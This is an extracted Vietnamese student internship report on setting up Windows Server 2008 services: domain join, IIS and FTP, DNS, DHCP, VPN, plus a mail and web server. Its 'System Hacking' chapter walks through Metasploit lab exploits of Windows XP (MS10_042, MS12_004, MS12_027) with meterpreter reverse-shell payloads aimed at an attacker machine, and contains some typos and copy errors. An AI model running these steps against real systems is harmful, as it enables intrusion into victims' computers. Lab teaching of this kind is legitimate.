Internet Protocol Version 4 (TCP/IPv4) Properties.
  24. 24. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 24 Click phải My Computer Properties Change Settings. Nhấn nút Change Chọn Domain Nhập tên domain Công việc thành công. Nhấn OK để chấp nhận Restart máy. Nhấn Restart Now. Sau khi restart, logon vào domain Administrator máy tính đã trở thành 1 client của domain athena.edu.vn.
  25. 25. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 25 2.3 TRIỂN KHAI DỊCH VỤ IIS-DNS 2.3.1 Khái niệm về IIS IIS là viết tắt của từ Internet Information Services IIS được đính kèm với các phiên bản của windows nhằm cung cấp và phân tán các thông tin lên mạng, nó bao gồm nhiều dịch vụ khác nhau như web server, FPT server,... Nó có thể được sử dụng để xuất bản nội dung của các trang web lên Internet/Intranet bằng việc sử dụng phương thức chuyển giao siêu văn bản “ – hypertext Transport Protocol (HTTP) ”. Như vậy sau khi bạn thiết kế xong các trang web của mình nếu bạn muốn đưa chúng lên mạng để mọi người có thể truy cập và xem chúng thì bạn phải nhờ đến một web server, ở đây là IIS nếu không thì trang web của bạn chỉ có thể được xem trên chính máy của bạn hoặc thông qua việc chia sẻ tệp (file sharing) như các tệp bất kỳ trong mạng nội bộ mà thôi. 2.3.2 Cài đặt IIS Chuẩn bị: Thực hiện: Bước 1: Cài đặt IIS: ta vào Start menu > Administrative tools > Server Manager
  26. 26. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 26 Click Add Roles Click chọn: Web Server (IIS)
  27. 27. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 27 Chọn Add Required Features Click NEXT > NEXT Click chọn FTP Publishing Service
  28. 28. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 28 Click Add Required Services Click Next > Instal Bước 2: Tạo một trang Web và kiểm tra  Tạo thư mục chứa trang Web đường dẫn: C:athena  Trong thư mục "C:athena" tạo một File tên: "index.htm" Ta Edit file này với Notepad và thêm nội dung là: Welcome to Athena.edu.vn >Save file
  29. 29. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 29 Ta đăng ký trang web nay với IIS .. và truy cập bằng dịch vụ web. Start menu > Administrative > IIS R-Click vào Sites > Add Web Site…
  30. 30. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 30  Site name: Athena  Physical path: C:athena  OK Lưu ý: Khi thực hiện tạo web site mới trên cùng một cổng 80 thì sẽ bị trùng với trang Default Web Site, cho nên ta phải Stop trang Default hoặc xóa nó đi. Kiểm tra: Mở trình duyệt Web gỏ vào địa chỉ: 192.168.1.1 để xem kết quả Bước 3: Tạo một FTP Site và kiểm tra  Start menu > Administrative tools > IIS Chọn FTP Sites > Click here to lauch
  31. 31. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 31 R-Click FTP Site > New > FTP Site Click NEXT >
  32. 32. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 32 Ðặt tên cho FTP Site > Next
  33. 33. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 33 Click Next Chọn Do not isolate users > Next Chọn đường dẫn thư mục Home của FTP site > Next
  34. 34. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 34  READ : Chỉ đọc  WRITE: Cho phép ghi dữ liệu  Next > Finish  Lưu ý quan trọng: FTP site mới nếu sử dụng cổng mặc định là 21 thì sẽ bị trùng với các FTP Site khác cùng chung cổng 21. Trong cùng một thời điểm chỉ có 1 FTP site được chạy trên cùng một cổng.  Kiểm tra : Trên Windows XP - PC 1 Mở trình windows explorer: gõ vào ô địa chỉ đường dẫn sau để truy cập FTP Site: ftp://192.168.1.1  Tạo một thư mục trên FTP Site
  35. 35. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 35 2.3.3 DNS Mục tiêu: Trong phần 2 mình đã xây dựng thành công IIS và thực hiện kiểm tra một web site. Tuy nhiên web site chỉ truy cập bằng IP, trong trường hợp muốn chạy nhiều trang web cùng một lúc thì phải thay đổi Port của trang web ở phần này , các bạn xây dựng thêm dịch vụ DNS, dịch vụ này giúp các bạn tạo nhiều trang web chạy cùng một cổng (80). Đồng thời cung cấp khả năng truy cập các trang Web bẳng tên miền thay cho IP. 1. Thực hiện: Bước 1: Cài đặt dịch vụ DNS Start menu > Administrative tools > Server Manager Chọn DNS Server > Next > Next > Install Bước 2: Cấu hình DSN Zones và kiểm tra Start menu > Administrative Tools > DSN
  36. 36. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 36 R-Click Forward Lookup Zone > New Zone… Click Next
  37. 37. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 37 Chọn Primary zone > Next Click Next
  38. 38. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 38 Click Next Click Next
  39. 39. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 39 Click Finish 2.4 TRIỂN KHAI DỊCH VỤ DHCP 2.4.1 Khái niệm DHCP là viết tắt của Dynamic Host Configuration Protocol, là giao thức Cấu hình Host Động được thiết kế làm giảm thời gian chỉnh cấu hình cho mạng TCP/IP bằng cách tự động gán các địa chỉ IP cho khách hàng khi họ vào mạng. Dich vụ DHCP là một thuận lới rất lớn đối với người điều hành mạng. Nó làm yên tâm về các vấn đề cố hữu phát sinh khi phải khai báo cấu hình thủ công 2.4.2. Chức năng - DHCP Server: máy quản lý việc cấu hình và cấp phát địa chỉ IP cho Client. - DHCP Client: máy trạm nhận thông tin cấu hình IP từ DHCP Server. - Scope: phạm vi liên tiếp của các địa chỉ IP có thể cho một mạng.
  40. 40. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 40 - Exclusion Scope: là dải địa chỉ nằm trong Scope không được cấp phát động cho Client - Reservation: Địa chỉ đặt trước dành riêng cho máy tính hoặc thiết bị chạy các dịch vụ (tùy chọn này thường được thiết lập để cấp phát địa chỉ cho các Server, Printer,…..) - Scope Options: các thông số được cấu hình thêm khi cấp phát IP động cho Clients như DNS Server(006), Router(003) 2.4.3 Cấu hình dịch vụ DHCP Chuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 - Máy Windows XP: PC 1 NIC 1: IP nhận động Mô hình: Mục tiêu: - Xây dựng máy chủ dịch vụ cấp phát địa chỉ IP động cho các máy trong mạng LAN. Thực hiện: Bước 1: Cài đặt dịch vụ DHCP trong Server Roles. Start Menu > Adminsitrative tools > Server Manager
  41. 41. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 41 Click Add Roles. Click chọn DHCP Server > Next
  42. 42. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 42 Chọn chính xác card mạng mà ta muốn cấp phát IP thông qua nó! > Next Thông tin Domain, Primary DNS, Altenate DNS. Ví dụ: Domain Athena.edu.vn, DNS: 192.168.1.1 > Next ở cửa sổ này ta click vào WINS is not required for applications on this network> next
  43. 43. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 43 DHCP Scopes > Click Add Scope Điền thông tin Scope. > OK > Next
  44. 44. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 44 IP version 6: Disable > Next > Install > Close Bước 2: Kiểm tra IP được cấp trên máy Windows XP IP đã nhận chính xác từ DHCP – Server
  45. 45. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 45 2.5 TRIỂN KHAI DỊCH VỤ VPN 2.5.1 Khái niệm Tìm hiểu về VPN VPN được hiểu là phần mở rộng của một mạng Intranet được kết nối thông qua mạng công cộng nhằm bảo đảm an toàn và tăng hiệu quả giá thành kết nối giữa hai đầu nối.Cơ chế và độ giới hạng bảo mật tinh vi cũng được sử dụng để bảo đảm tính an toàn cho việc trao đổi những dữ liệu dễ bị đánh cập thông qua một môi trường không an toàn. Cơ chế an toàn bao gồm những khái niệm sau đây : Encryption: Mã hoá dữ liệu là một quá trình xữ lý thay đổi dữ liệu theo một chuẩn nhất định và dữ liệu chỉ có thể được đọc bởi người dùng mong muốn. Ðể đọc được dữ liệu người nhận buộc phải có chính xác một khóa giải mã dữ liệu. Theo phương pháp truyền thống, người nhận và gửi dữ liệu sẽ có cùng một khoá để có thể giải mã và mã hoá dữ liệu. Lược đồ public-key sử dụng 2 khóa, một khóa được xem như một public-key (khóa công cộng) mà bất cứ ai cũng có thể dùng để mã hoá và giải mã dữ liệu. Authentication: Là một quá trình xữ lý bảo đảm chắc chắn dữ liệu sẽ được chuyễn đến người nhận đồng thời cũng bảo đảm thông tin nhận được nguyên vẹn. Ở hình thức cơ bản, Authentication đòi hỏi ít nhất phải nhập vào Username và Password để có thể truy cập vào tài nguyên. Trong một số tình huống phức tạp, sẽ có thêm secret-key hoặc public-key để mã hoá dữ liệu. Authorization: Ðây là quá trình xữ lý cấp quyền truy cập hoặc ngăn cấm vào tài nguyên trên mạng sau khi đã thực hiện Authentication Sự phát triển của VPN VPNs không phải là một công nghệ hoàn toàn mới, khái niệm về VPNs đã có từ 15 năm trước và trải qua nhiều quá trình phát triển, thay đổi cho đến nay đã tạo ra một dạng mới nhất.
  46. 46. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 46 VPNs đầu tiên đã được phát sinh bởi AT&T từ cuối những năm 80 và được biết như Software Defined Networks (SDNs). Thế hệ thứ hai của VPNs ra đời từ sự xuất hiện của công nghệ X.25 và mạng dịch vụ tích hợp kỹ thuật số (Integrated Services Digital Network : ISDN) từ đầu những năm 90. Hai công nghệ này cho phép truyền những dòng gói (package streams) dữ liệu qua các mạng chia sẽ chung. Sau khi thế hệ thứ hai của VPNs ra đời, thị trường VPNs tạm thời lắng động và chậm tiến triển, cho tới khi có sự nổi lên của hai công nghệ cell-based Frame Relay (FR) Asynchronous Tranfer Mode (ATM). Thế hệ thứ ba của VPNs đã phát triển dựa theo 2 công nghệ này. Hai công nghệ này phát triển dựa trên khái niệm về Virtual Circuit Switching, theo đó, các gói dữ liệu sẽ không chứa địa chỉ nguồn và đích. Thay vào đó, chúng sẽ mang những con trỏ, trỏ đến các virtual curcuit nơi mà dữ liệu nguồn và đích sẽ được giải quyết. 2.5.2 Cấu hình VPN Client to site 1.Chuẩn bị: - Máy Windows Server 2008: Server 1 NIC 1: 192.168.1.1/24 (NAT) NIC 2: 10.0.0.1/8 (Host Only) - Máy Windows XP: PC 1 NIC 1: 192.168.1.2/24 (NAT) - Máy Windows XP: PC 2 NIC 1: 10.0.0.2/8 (Host only)
  47. 47. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 47 Mô hình: Thực hiện: Bước 1: Cài đặt Routing and Remote Access Trên máy Server 1, Server 2 tiến hành cài đặt dịch vụ Routing And Remote Access. Vào Start Menu > Administrative Tools > Server Manager
  48. 48. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 48 Bấm vào Add Roles Chọn NEXT Click chọn Network Policy and Access Services. > Next > Next
  49. 49. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 49 Click chọn Routing and Remote Access Services. > Next > Install. Click Close sau khi cài xong. Bước 2: Cấu hình Routing and Remote Access. Thực hiện trên Server 1 Vào Start Menu > Administrative Tools > Routing and Remote Access. Click phải chuột vào Server > Configure and Enable Routing Remote Access
  50. 50. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 50 Click Next Chọn dòng Custom configuration > Next
  51. 51. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 51 Chọn hai mục: VPN Access và LAN routing > Next > Finish > Start Service R- Click Server > Propertices
  52. 52. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 52 Click chọn: Static address pool > Click Add Điền range IP:  Start IP address: 192.168.1.50  End IP address: 192.168.1.100  OK > OK Bước 3: tạo tài khoản trên Server và cấp quyền truy cập VPN Start menu > Administrative tools > Server Manager
  53. 53. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 53 Trong nhánh Configuration > Local Users and Group R-Click vào Users > New User Điền thông tin user > Create > Close
  54. 54. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 54 R-Click vào User vpn > Propertices Trong thẻ Dial-in Click chọn: Allow access > OK
  55. 55. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 55 Bước 4: Tạo kết nối VPN trên máy PC 2: Start menu > Settings > Control Panel > Network and internet connection Chọn mục: Create a connection to the network at your workplace Chọn mục: Virtual Private Network connection > Next
  56. 56. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 56 Điền thông tin công ty: Athena > Next Ðiền IP của Server: 10.0.0.1 (Ðây la IP NIC 2 c.a Server 1) > Next
  57. 57. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 57 Chọn Add a shorcut to connection to my desktop > Finish R-Click vào "Athena" ch.n Connect
  58. 58. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 58 Điền thông tin user vpn và password > Connect
  59. 59. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 59 Trên máy PC 2 tiến hành ping kiểm tra kết nối đến máy PC 1 Tín hiệu phản hồi từ PC 2 là rất tốt. Bước 5: Share thư mục trên PC 1 và tiến hành truy cập từ PC 2 Share thành công. 2.5.3 Cấu hình dịch vụ VPN Site to Site Chuẩn bị: - Máy Windows Server 2008: Server 1:
  60. 60. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 60 NIC 1: 192.168.1.1/24 (Host only) NIC 2: 10.0.0.1/8 (NAT) - Máy Windows Server 2008: Server 2: NIC 1: 192.168.2.1/24 (Host only)NIC 2: 10.0.0.2/8 (NAT) - Máy Windows XP: PC 1: NIC 1: 192.168.1.2/24 (Host only) GW: 192.168.1.1 - Máy Windows XP: PC 2: NIC 1: 192.168.2.2/24 (Host only) GW: 192.168.2.1 Mô hình: Lưu ý: Trên các máy sử dụng, tạm thời tắt tính năng Windows Firewall Thực hiện: Bước 1: Cài đặt Routing and Remote Access trên Server 1 và Server 2. Trên máy Server 1, Server 2 tiến hành cài đặt dịch vụ Routing And Remote Access. Vào Start Menu > Administrative Tools > Server Manager
  61. 61. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 61 Bấm vào Add Roles Chọn NEXT
  62. 62. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 62 Click chọn Network Policy and Access Services. > Next > Next Click chọn Routing and Remote Access Services. > Next > Install. Click Close sau khi cài xong. Bước 2: Cấu hình Routing and Remote Access.
  63. 63. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 63 Thực hiện trên Server 1 và Server 2 Vào Start Menu > Administrative Tools > Routing and Remote Access. Click phải chuột vào Server > Configure and Enable Routing Remote Access Click Next
  64. 64. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 64 Chọn dòng Custom configuration > Next Chọn các mục: VPN access; Demand-dial connection; LAN routing > Next > Finish > Start Service Bước 3: Cấu hình VPN Thực hiện như nhau trên cả Server 1 và Server 2.
  65. 65. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 65 R-Click vào Network interfaces > New Demand-dial interface > > Next
  66. 66. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 66 Ðặt tên interface là athena > Next Chọn Connect using virtual private networking (VPN) > Next
  67. 67. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 67 Chọn Automatic selection > Next Trên Server 1 ở bước này ta điền vào IP của Server 2. Trên Server 2 điền IP của Server 1
  68. 68. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 68 Chọn thêm: Add a user account so a remote router can dial in > Next Click Add:
  69. 69. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 69 Trên Server 1: Ðiền IP Network Address của mạng trong Server 2 (NIC 1) Trên Server 2: Ðiền IP Network Address của mạng trong Server 1 (NIC 1) > OK > Next User Dial-In: cho phep kết nối đến Điền mật khẩu cho user mới (User tren Server dành riêng cho VPN) > Next
  70. 70. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 70 Phần User cho Dial-Out cũng điền thông tin như user Dial-in trước đó. > Next > Finish Thực hiện tương tự cho Server 2. Bước 4: Cấu hình Address Pool R- Click Server > Propertices
  71. 71. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 71 Click chọn: Static address pool > Click Add Điền range IP: Start IP address: 192.168.1.50 End IP address: 192.168.1.100 > OK > OK Bước 5: kiểm tra Từ máy PC 1 thực hiện Ping thẳng đến máy PC 2.
  72. 72. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 72 Ở một loạt các gói đầu tiên, Server 1 và Server 2 chưa kết nối nên không có gói phản hồi. Sau khi phát hiện có trafic từ các máy PC 1, PC 2, dịch vụ VPN trên Server sẽ tự kích hoạt và kết nối, tại thời điểm sau khi đã có kết nối VPN các gói ping đã phản hồi thành công. CHƯƠNG 3: TRIỂN KHAI DỊCH VỤ TRÊN VPS 3.1 Mail Server VPS: 3.1.1 Giới Thiệu MDaemon Là phần mền quản lý thư điện tử chạy trên window và được thiết kế có thể sử dụng từ sáu account đến hàng nghìn account. MDaemon rất đơn giản và dễ cấu hình, đồng thời là một phần mền có giá thành rất hợp lý như lại có rất nhiều đặc tính cho phép dễ quản lý hơn các hệ thống thư điện tử khác trên thị trường. MDaemon được thiết kế trên ý tưởng sử dụng cả kết nối dial-up (khi địa chỉ ip tĩnh có không thể cung cấp) và các kết nối trực tiếp. 3.1.2 Cài Đặt Chạy File Setup_MD v10.exe
  73. 73. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 73 . Nhập vào tên domain “nguyencaotuan.tk”. Tiếp tục nhấn Next và tạo 1 account đầu tiên.
  74. 74. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 74 Tiếp tục ta nhập vào DNS server “14.0.21.130”và nhấn Next  Finish để kết thúc.
  75. 75. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 75 3.1.3 Cấu Hình Khởi động chương trình MDaemon và nhấn Ctrl+U. Bỏ tick và ô require strong passwords. Vào Account  New Accout để tạo account thứ 2.
  76. 76. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 76 3.1.4 Kiểm Tra Trên máy Server ta vào trình duyệt web gõ: www.nguyencaotuan.tk:3000 và đăng nhập vào account :u1@nguyencaotuan.tk Soạn thư và gửi vào mail google: aphazero@gmail.com ,sau đó gửi ngược lại mail Server Kiểm tra bên Server (u1@nguyencaotuan.tk) đã nhận được thư từ mail google (aphazero@gmail.com). 3.2 Web Server VPS: 3.2.1 Cấu Hình Và Cài Đặt Xampp a. Giới thiệu Xampp là một chương trình tạo máy chủ Web (Web Server) được tích hợp sẵn Apache, PHP, MySQL, FTP Server, Mail Server và các công cụ như phpMyAdmin. Không như Appserv, Xampp có chương trình quản lý khá tiện lợi, cho phép chủ động bật tắt hoặc khởi động lại các dịch vụ máy chủ bất kỳ lúc nào.
  77. 77. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 77 b. Cấu hình Ta click Start vào 2 mục Apache và Mysql.Sau đó nhấn vào nút Admin của mục Mysql để bắt đầu tạo database Tại ô Create new database ta gõ vào tên cơ sở dữ liệu sau đó nhấn nút Create
  78. 78. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 78 CHƯƠNG 4: SYSTEM HACKING 4.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042 Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân) Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.37.128 Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
  79. 79. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 79 Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms10_042 Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được. Dùng lệnh SRVHOST <địa chỉ ip máy backtrack> Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp Dùng lệnh set LHOST <ip backtrack> Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.37.128:80/ nếu máy nạn nhân vào đường dẫn này sẽ bị hack. Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.37.129
  80. 80. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 80 Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.37.128:80/ Trên máy XP tự động xuất hiện hộp thoại Help and Support. Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ http://192.168.1.5:80.Và nhận thấy có địa chỉ 192.168.1.6 kết nối vào. Trên máy back track ta gõ lệnh sessions để kiểm tra.
  81. 81. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 81 Dùng lệnh sessions –i 1 Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành công lỗ hổng MS10_042 trên máy XP. 4.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004 Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
  82. 82. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 82 Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được. Dùng lệnh SRVHOST <địa chỉ ip máy backtrack> Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp Dùng lệnh set LHOST <ip backtrack> Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.37.128:8080/GtZtrdin nếu máy nạn nhân vào đường dẫn này sẽ bị hack. Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.37.128:8080/GtZtrdin Trên máy XP tự động xuất hiện hộp thoại yêu cầu chạy Windows Media Player. Nếu chọn Run sẽ bị hack.
  83. 83. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 83 Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ http://192.168.37.128:8080/GtZtrdin Gõ lệnh sessions Dùng lệnh sessions –i 1 Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác thành công lỗ hổng MS10_042 trên máy XP.
  84. 84. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 84 4.3 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027 Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_027 Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được Dùng lệnh setFILENAMEtên_file. Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp Dùng lệnh set LHOST <địa chỉ ip máy backtrack> Dùng lệnh exploit để khai thác lỗi.
  85. 85. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 85 Trên máy Back track copy file đã có mã độc ra ngoài desktop Dùng lệnh use/exploit/multi/handler Dùng lệnh set PAYLOAD windows/meterpreter/reverse_tcp Dùng lệnh exploit để bắt đầu lắng nghe. Nếu máy nạn nhân truy cập vào file này sẽ nhiểm mã độc và máy Back track đã nhận thấy 1 kết nối và tạo phiên kết nối với nạn nhân. Dùng lệnh sysinfo để kiểm tra. Như vậy ta đã hoàn thành khai thác lỗi MS12_027 trên win XP.
  86. 86. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 86 CHƯƠNG 5: HƯỚNG PHÁT TRIỂN VÀ KẾT LUẬN 5.1. Hướng phát triển Mô hình mạng sử dụng hệ điều hành Windows Server 2008 có thể dễ dàng update lên Windows Server 2012. Window Server 2012 là hệ điều hành Windows Server tân tiến, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và dịch vụ Web thế hệ mới. Với Windows Server 2012, bạn có thể phát triển, cung cấp và quản lý các trải nghiệm người dùng và ứng dụng phong phú, đem tới một hạ tầng mạng có tính bảo mật cao, và tăng cường hiệu quả về mặt công nghệ và giá trị trong phạm vi tổ chức của mình. Windows Server 2012 kế thừa những thành công và thế mạnh của các hệ điều hành Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới, công nghệ ảo hóa, tính bảo mật tăng cường và các tiện ích quản lý giúp tiết kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững chắc cho hạ tầng Công nghệ Thông tin (CNTT). 5.2. Kết luận Microsoft đã ra Windows Server 2012 nhưng Windows Server 2008 vẫn được sử dụng rộng rãi hơn do không yêu cầu cấu hình máy mạnh nên phù hợp với các công ty nhỏ và nhất là trường học, nơi mà kinh phí dành cho hệ thống máy tính không lớn. Do vậy em chọn đề tài này vì tính ứng dụng cao của nó, ngoài ra khi có nhu cầu ta có thể dễ dàng update lên phiên bản Windows Server 2012 một cách dễ dàng. Mô hình này vẫn chưa được đầy đủ nhưng đã phần nào đáp ứng được những yêu cầu đơn giảncho trung tâm, doanh nghiệp nhỏ. Những khó khăn trong lúc thực hiện: Trong quá trình thực hiện đề tài còn có những khó khăn như bản quyền phần mềm, thiết bị phần cứng còn hạn chế, nên chưa thể thể hiện được hết những tối ưu của đề tài. Tuy đề tài Windows Server 2008 đã khá quen thuộc nhưng khi bắt đầu thực hiện em cũng gặp khá nhiều khó khăn vì những lỗi tuy nhỏ nhưng rất nhiều như: Join domain cho máy này được nhưng không join domain cho máy khác được, khi tắt hết 2 máy server PDC và ADC thì máy client vẫn đăng nhập được hay lỗi SID do copy máy ảo, lỗi trùng IP,…
  87. 87. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 87 Những gì đạt được trong lúc thực tập: Qua khóa thực tập ở Athena em đã thu được nhiều kinh nghiệm quý báu như:Được biết thêm những kiến thức mới từ đề tài các bạn thực tập tại Athena về vấn đề an ninh hiện nay, biết trao đổi thảo luận nhóm khi gặp được khó khăn trong đề tài. Thầy hướng dẫn không giải đáp thắc mắc của em ngay mà bảo em hãy lên web hay sách vở kiếm thêm thông tin, giúp em biết cách kiếm thông tin từ vô vàng những nguồn tin trên mạng.Đồng thời còn giúp em cố gắng đọc những thông tin bằng tiếng Anh chứ không ỷ y vào lời giải đáp của người khác nữa. Quan trọng nhất là em đã học được cách trình bày ý kiến của mình một cách tự tin và rõ ràng trước nhóm, trước đám đông qua việc quay video clip hướng dẫn cách làm đề tài và thuyết trình với nhiều bạn và thầy tham gia. Điều này sẽ giúp em tự tin rất nhiều trong môi trường là việc sau 